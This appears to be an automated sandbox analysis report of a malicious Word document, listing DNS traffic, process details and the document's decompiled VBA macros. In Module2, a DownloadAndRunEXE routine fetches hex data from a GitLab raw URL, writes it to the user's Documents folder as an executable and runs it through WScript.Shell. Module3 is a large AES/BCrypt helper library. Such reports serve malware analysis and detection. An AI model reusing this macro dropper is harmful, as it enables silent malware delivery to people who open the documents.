          Jan 14, 2025 15:19:44.370132923 CET53592051.1.1.1192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jan 14, 2025 15:19:44.362106085 CET192.168.2.51.1.1.10x4b7eStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jan 14, 2025 15:19:11.790977955 CET1.1.1.1192.168.2.50xb002No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
          Jan 14, 2025 15:19:11.790977955 CET1.1.1.1192.168.2.50xb002No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Jan 14, 2025 15:19:11.790977955 CET1.1.1.1192.168.2.50xb002No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
          Jan 14, 2025 15:19:44.370132923 CET1.1.1.1192.168.2.50x4b7eName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:09:19:12
          Start date:14/01/2025
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Imagebase:0xcf0000
          File size:1'620'872 bytes
          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Call Graph

          • Entrypoint
          • Decryption Function
          • Executed
          • Not Executed
          • Show Help
          callgraph 2 CallTestAES 2613 ikwiwiejs_19293_Ade Len:1,Environ:1,Mid:1,CreateObject:1,ShellExecute:1 2->2613 14 HexToBinary Len:1,CByte:1,Mid:1 73 GetDataFromURL Status:1,responseText:1,CreateObject:1,Open:1,Send:1 119 DownloadAndRunEXE MsgBox:3,LBound:1,Len:1,Environ:1,FreeFile:1, Run:1,UBound:1,CreateObject:1,Dir:1 119->14 119->73 452 AesEncryptString Replace:1,vbNullString:4,UBound:3,IsMissing:1,Raise:1 846 AesCryptArray Array:1,Description:1,vbNullString:3,Number:1,Err:3, UBound:2,VarPtr:3,IsMissing:2,Raise:1, Source:1 452->846 2193 ToBase64Array Left$:1,Len:1,UBound:3,VarPtr:1 452->2193 2347 ToUtf8Array Len:2,vbNullString:1 452->2347 x 2 646 AesDecryptString vbNullString:4,UBound:4,IsMissing:1,Raise:1 646->846 2270 FromBase64Array Len:2,vbNullString:1,VarPtr:1 646->2270 646->2347 2434 FromUtf8Array Left$:1,Len:1,UBound:3 646->2434 1281 pvCryptoAesCtrInit vbNullString:2,UBound:3 846->1281 1636 pvCryptoAesCtrTerminate 846->1636 x 2 1712 pvCryptoAesCtrCrypt UBound:1 846->1712 2014 pvCryptoGetFinalHash 846->2014 846->2347 x 2 2590 PeekPtr 846->2590 x 6 1185 AesChunkedInit vbNullString:1 1185->1281 1185->1636 1236 AesChunkedCryptArray 1236->1636 1236->1712 1275 AesChunkedGetLastError 2507 GetSystemMessage Left$:1,Len:1,Mid$:1,Hex:1 1281->2507 2057 pvInc 1712->2057 x 4 1712->2507 2096 Get pvArrayPtr LBound:2,UBound:1,VarPtr:1 2153 Get pvArraySize LBound:1,UBound:1 2613->646 2841 Class_Initialize 2851 Document_Open Now:1,TimeValue:1

          Module: Module1

          Declaration
          LineContent
          1

          Attribute VB_Name = "Module1"

          APIsMeta Information

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Environ

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Open

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Len

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Mid

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: CreateObject

          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: ShellExecute

          LineInstructionMeta Information
          2

          Public Sub CallTestAES()

          3

          Dim kakensooe as New ViewSession

          4

          kakensooe.ikwiwiejs_19293_Ade

          6

          End Sub

          Module: Module2

          Declaration
          LineContent
          1

          Attribute VB_Name = "Module2"

          2

          Option Explicit

          APIsMeta Information

          Part of subcall function GetDataFromURL@Module2: CreateObject

          Part of subcall function GetDataFromURL@Module2: Open

          Part of subcall function GetDataFromURL@Module2: Send

          Part of subcall function GetDataFromURL@Module2: Status

          Part of subcall function GetDataFromURL@Module2: responseText

          MsgBox

          vbCritical

          Part of subcall function HexToBinary@Module2: Len

          Part of subcall function HexToBinary@Module2: CByte

          Part of subcall function HexToBinary@Module2: Mid

          Environ

          FreeFile

          Open

          LBound

          UBound

          Len

          Dir

          CreateObject

          Run

          MsgBox

          vbInformation

          MsgBox

          vbCritical

          StringsDecrypted Strings
          "https://gitlab.com/app8490744/updatesa/-/raw/main/up"
          """"
          "Kh\xf4ng t?i du?c d? li?u t? URL."
          "L?i"
          "Kh\xf4ng t?i du?c d? li?u t? URL."
          "L?i"
          "USERPROFILE"
          """"
          "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
          "Th\xe0nh c\xf4ng"
          "WScript.Shell"
          "WScript.Shell"
          """"
          "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
          "Th\xe0nh c\xf4ng"
          "Kh\xf4ng th? t?o file EXE."
          "L?i"
          LineInstructionMeta Information
          40

          Sub DownloadAndRunEXE()

          41

          Dim hexData as String

          42

          Dim binaryData() as Byte

          43

          Dim savePath as String

          44

          Dim fileNum as Integer

          45

          Dim i as Long

          48

          hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up")

          50

          If hexData = "" Then

          51

          MsgBox "Kh\xf4ng t?i du?c d? li?u t? URL.", vbCritical, "L?i"

          MsgBox

          vbCritical

          52

          Exit Sub

          53

          Endif

          56

          binaryData = HexToBinary(hexData)

          59

          savePath = Environ("USERPROFILE") & "\Documents\example.exe"

          Environ

          60

          fileNum = FreeFile

          FreeFile

          62

          Open savePath For Binary As # fileNum

          Open

          63

          For i = LBound(binaryData) To UBound(binaryData)

          LBound

          UBound

          64

          Put # fileNum, , binaryData(i)

          65

          Next i

          LBound

          UBound

          66

          Close # fileNum

          69

          If Len(Dir(savePath)) > 0 Then

          Len

          Dir

          70

          Dim shell as Object

          71

          Set shell = CreateObject("WScript.Shell")

          CreateObject

          74

          shell.Run """" & savePath & """", 1, False

          Run

          75

          MsgBox "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!", vbInformation, "Th\xe0nh c\xf4ng"

          MsgBox

          vbInformation

          76

          Else

          77

          MsgBox "Kh\xf4ng th? t?o file EXE.", vbCritical, "L?i"

          MsgBox

          vbCritical

          78

          Endif

          79

          End Sub

          APIsMeta Information

          CreateObject

          Open

          Send

          Status

          responseText

          StringsDecrypted Strings
          "MSXML2.XMLHTTP"
          "GET"
          """"
          LineInstructionMeta Information
          21

          Function GetDataFromURL(url as String) as String

          22

          Dim http as Object

          23

          Set http = CreateObject("MSXML2.XMLHTTP")

          CreateObject

          25

          On Error Resume Next

          26

          http.Open "GET", url, False

          Open

          27

          http.Send

          Send

          29

          If http.Status = 200 Then

          Status

          30

          GetDataFromURL = http.responseText

          responseText

          31

          Else

          32

          GetDataFromURL = ""

          33

          Endif

          35

          On Error Goto 0

          36

          Set http = Nothing

          37

          End Function

          APIsMeta Information

          Len

          CByte

          Mid

          StringsDecrypted Strings
          "&H"
          "&H"
          LineInstructionMeta Information
          5

          Function HexToBinary(hexString as String) as Byte()

          6

          Dim i as Long

          7

          Dim length as Long

          8

          Dim byteArray() as Byte

          10

          length = Len(hexString) \ 2

          Len

          11

          Redim byteArray(length - 1)

          13

          For i = 0 To length - 1

          14

          byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))

          CByte

          Mid

          15

          Next i

          17

          HexToBinary = byteArray

          18

          End Function

          Module: Module3

          Declaration
          LineContent
          1

          Attribute VB_Name = "Module3"

          3

          Option Explicit

          4

          DefObj A-Z

          12

          #if Win64 then

          13

          Private Const PTR_SIZE as Long = 8

          14

          #else

          15

          Private Const PTR_SIZE as Long = 4

          16

          #endif

          18

          #if HasPtrSafe then

          19

          Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory"(lpvDest as Any, lpvSource as Any, ByVal cbCopy as LongPtr)

          20

          Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr"(Ptr() as Any) as LongPtr

          21

          Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong as Long) as Long

          22

          Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036"(RandomBuffer as Any, ByVal RandomBufferLength as Long) as Long

          24

          Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm as LongPtr, ByVal pszAlgId as LongPtr, ByVal pszImplementation as LongPtr, ByVal dwFlags as Long) as Long

          25

          Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm as LongPtr, ByVal dwFlags as Long) as Long

          26

          Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, pbOutput as Any, ByVal cbOutput as Long, cbResult as Long, ByVal dwFlags as Long) as Long

          27

          Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, ByVal pbInput as LongPtr, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

          28

          Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phKey as LongPtr, pbKeyObject as Any, ByVal cbKeyObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

          29

          Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey as LongPtr) as Long

          30

          Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal pPaddingInfo as LongPtr, ByVal pbIV as LongPtr, ByVal cbIV as Long, pbOutput as Any, ByVal cbOutput as Long, pcbResult as Long, ByVal dwFlags as Long) as Long

          31

          Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf as LongPtr, pbPassword as Any, ByVal cbPassword as Long, pbSalt as Any, ByVal cbSalt as Long, ByVal cIterations as Currency, pbDerivedKey as Any, ByVal cbDerivedKey as Long, ByVal dwFlags as Long) as Long

          32

          Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phHash as LongPtr, ByVal pbHashObject as LongPtr, ByVal cbHashObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

          33

          Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash as LongPtr) as Long

          34

          Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

          35

          Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash as LongPtr, pbOutput as Any, ByVal cbOutput as Long, ByVal dwFlags as Long) as Long

          36

          #else

          APIsMeta Information

          vbNullString

          vbNullString

          AES_IVLEN

          UBound

          BCryptOpenAlgorithmProvider

          StrPtr

          KDF_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          BCryptDeriveKeyPBKDF2

          pvArrayPtr

          pvArraySize

          KDF_ITER

          UBound

          BCryptOpenAlgorithmProvider

          StrPtr

          MS_PRIMITIVE_PROVIDER

          BCryptGetProperty

          StrPtr

          BCryptSetProperty

          StrPtr

          BCryptGenerateSymmetricKey

          CopyMemory

          AES_IVLEN

          BCryptOpenAlgorithmProvider

          StrPtr

          HMAC_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          BCryptGetProperty

          StrPtr

          BCryptCreateHash

          AES_IVLEN

          LastError

          Part of subcall function GetSystemMessage@Module3: Space$

          Part of subcall function GetSystemMessage@Module3: FormatMessage

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

          Part of subcall function GetSystemMessage@Module3: Len

          Part of subcall function GetSystemMessage@Module3: Mid$

          Part of subcall function GetSystemMessage@Module3: vbCrLf

          Part of subcall function GetSystemMessage@Module3: Left$

          Part of subcall function GetSystemMessage@Module3: Hex

          LastError

          ERR_UNSUPPORTED_ENCR

          StringsDecrypted Strings
          "Microsoft Primitive Provider"
          "AES"
          "ObjectLength"
          "ChainingMode"
          "ChainingModeECB"
          "HashDigestLength"
          LineInstructionMeta Information
          299

          Private Function pvCryptoAesCtrInit(uCtx as UcsCryptoContextType, baPass() as Byte, baSalt() as Byte, baDerivedKey() as Byte, ByVal lKeyLen as Long) as Boolean

          300

          Const MS_PRIMITIVE_PROVIDER as String = "Microsoft Primitive Provider"

          301

          Const BCRYPT_ALG_HANDLE_HMAC_FLAG as Long = 8

          302

          Dim hResult as Long

          304

          With uCtx

          306

          . EncrData = vbNullString

          vbNullString

          307

          . EncrPos = 0

          308

          . LastError = vbNullString

          vbNullString

          309

          Redim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1)

          AES_IVLEN

          310

          If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then

          UBound

          312

          On Error Goto EH_Unsupported

          313

          hResult = BCryptOpenAlgorithmProvider(. hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

          BCryptOpenAlgorithmProvider

          StrPtr

          KDF_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          314

          If hResult < 0 Then

          315

          Goto QH

          316

          Endif

          317

          hResult = BCryptDeriveKeyPBKDF2(. hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt), KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)

          BCryptDeriveKeyPBKDF2

          pvArrayPtr

          pvArraySize

          KDF_ITER

          UBound

          319

          If hResult < 0 Then

          320

          Goto QH

          321

          Endif

          322

          On Error Goto 0

          323

          Endif

          325

          On Error Goto EH_Unsupported

          326

          hResult = BCryptOpenAlgorithmProvider(. hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)

          BCryptOpenAlgorithmProvider

          StrPtr

          MS_PRIMITIVE_PROVIDER

          327

          If hResult < 0 Then

          328

          Goto QH

          329

          Endif

          330

          On Error Goto 0

          331

          hResult = BCryptGetProperty(. hAesAlg, StrPtr("ObjectLength"), . AesKeyObjLen, 4, 0, 0)

          BCryptGetProperty

          StrPtr

          332

          If hResult < 0 Then

          333

          Goto QH

          334

          Endif

          335

          hResult = BCryptSetProperty(. hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)

          BCryptSetProperty

          StrPtr

          336

          If hResult < 0 Then

          337

          Goto QH

          338

          Endif

          339

          ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte ' BAD !

          340

          hResult = BCryptGenerateSymmetricKey(. hAesAlg, . hAesKey, . AesKeyObjData(0), . AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)

          BCryptGenerateSymmetricKey

          341

          If hResult < 0 Then

          342

          Goto QH

          343

          Endif

          345

          Call CopyMemory(. Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)

          CopyMemory

          AES_IVLEN

          347

          hResult = BCryptOpenAlgorithmProvider(. hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)

          BCryptOpenAlgorithmProvider

          StrPtr

          HMAC_HASH

          MS_PRIMITIVE_PROVIDER

          BCRYPT_ALG_HANDLE_HMAC_FLAG

          348

          If hResult < 0 Then

          349

          Goto QH

          350

          Endif

          351

          hResult = BCryptGetProperty(. hHmacAlg, StrPtr("HashDigestLength"), . HashLen, 4, 0, 0)

          BCryptGetProperty

          StrPtr

          352

          If hResult < 0 Then

          353

          Goto QH

          354

          Endif

          355

          hResult = BCryptCreateHash(. hHmacAlg, . hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - . HashLen), . HashLen, 0)

          BCryptCreateHash

          AES_IVLEN

          356

          If hResult < 0 Then

          357

          Goto QH

          358

          Endif

          359

          End With

          361

          pvCryptoAesCtrInit = True

          362

          Exit Function

          362

          QH:

          364

          uCtx.LastError = GetSystemMessage(hResult)

          LastError

          365

          Exit Function

          365

          EH_Unsupported:

          367

          uCtx.LastError = ERR_UNSUPPORTED_ENCR

          LastError

          ERR_UNSUPPORTED_ENCR

          368

          End Function

          APIsMeta Information

          IsArray

          IsMissing

          vbNullString

          IsArray

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          IsMissing

          IsArray

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          IsArray

          AES_KEYLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

          Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

          LastError

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

          LastError

          IsArray

          Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

          Part of subcall function pvCryptoGetFinalHash@Module3: BCryptFinishHash

          Part of subcall function pvCryptoGetFinalHash@Module3: hHmacHash

          Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

          UBound

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          VarPtr

          VT_BYREF

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          Part of subcall function PeekPtr@Module3: CopyMemory

          Part of subcall function PeekPtr@Module3: PTR_SIZE

          CopyMemory

          UBound

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Array

          Number

          Err

          Source

          Description

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Raise

          LineInstructionMeta Information
          186

          Public Function AesCryptArray(baData() as Byte, optional Password as Variant, optional Salt as Variant, optional key as Variant, optional ByVal KeyLen as Long, optional Error as String, optional Hmac as Variant) as Boolean

          194

          Const VT_BYREF as Long = &H4000

          195

          Dim uCtx as UcsCryptoContextType

          196

          Dim vErr as Variant

          197

          Dim bHashBefore as Boolean

          198

          Dim bHashAfter as Boolean

          199

          Dim baPass() as Byte

          200

          Dim baSalt() as Byte

          201

          Dim baKey() as Byte

          202

          Dim baTemp() as Byte

          203

          Dim lPtr as LongPtr

          205

          On Error Goto EH

          206

          If IsArray(Hmac) Then

          IsArray

          207

          bHashBefore = (Hmac(0) <= 0)

          208

          bHashAfter = (Hmac(0) > 0)

          209

          Endif

          210

          If IsMissing(Password) Then

          IsMissing

          211

          baPass = vbNullString

          vbNullString

          212

          Elseif IsArray(Password) Then

          IsArray

          213

          baPass = Password

          214

          Else

          215

          baPass = ToUtf8Array(Password & vbNullString)

          vbNullString

          216

          Endif

          217

          If IsMissing(Salt) Then

          IsMissing

          218

          baSalt = baPass

          219

          Elseif IsArray(Salt) Then

          IsArray

          220

          baSalt = Salt

          221

          Else

          222

          baSalt = ToUtf8Array(Salt & vbNullString)

          vbNullString

          223

          Endif

          224

          If IsArray(key) Then

          IsArray

          225

          baKey = key

          226

          Endif

          227

          If KeyLen <= 0 Then

          228

          KeyLen = AES_KEYLEN

          AES_KEYLEN

          229

          Endif

          230

          If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then

          231

          Error = uCtx.LastError

          LastError

          232

          Goto QH

          233

          Endif

          234

          If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore := bHashBefore, HashAfter := bHashAfter) Then

          235

          Error = uCtx.LastError

          LastError

          236

          Goto QH

          237

          Endif

          238

          If IsArray(Hmac) Then

          IsArray

          239

          baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)

          UBound

          240

          #if Win64 then

          241

          lPtr = PeekPtr(VarPtr(Hmac) + 8)

          VarPtr

          242

          #else

          243

          lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)

          VarPtr

          244

          #endif

          245

          If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then

          VarPtr

          VT_BYREF

          246

          lPtr = PeekPtr(lPtr)

          247

          Endif

          248

          #if Win64 then

          249

          lPtr = PeekPtr(lPtr + 16)

          250

          #else

          251

          lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)

          252

          #endif

          253

          Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)

          CopyMemory

          UBound

          254

          Endif

          256

          AesCryptArray = True

          256

          QH:

          258

          pvCryptoAesCtrTerminate uCtx

          259

          Exit Function

          259

          EH:

          261

          vErr = Array(Err.Number, Err.Source, Err.Description)

          Array

          Number

          Err

          Source

          Description

          262

          pvCryptoAesCtrTerminate uCtx

          263

          Err.Raise vErr(0), vErr(1), vErr(2)

          Raise

          264

          End Function

          APIsMeta Information

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          vbNullString

          IsArray

          IsMissing

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          KDF_SALTLEN

          RtlGenRandom

          KDF_SALTLEN

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: AES_KEYLEN

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VT_BYREF

          Part of subcall function AesCryptArray@Module3: CopyMemory

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: Array

          Part of subcall function AesCryptArray@Module3: Number

          Part of subcall function AesCryptArray@Module3: Err

          Part of subcall function AesCryptArray@Module3: Source

          Part of subcall function AesCryptArray@Module3: Description

          Part of subcall function AesCryptArray@Module3: Raise

          Raise

          vbObjectError

          IsArray

          UBound

          PREFIXLEN

          UBound

          PREFIXLEN

          CopyMemory

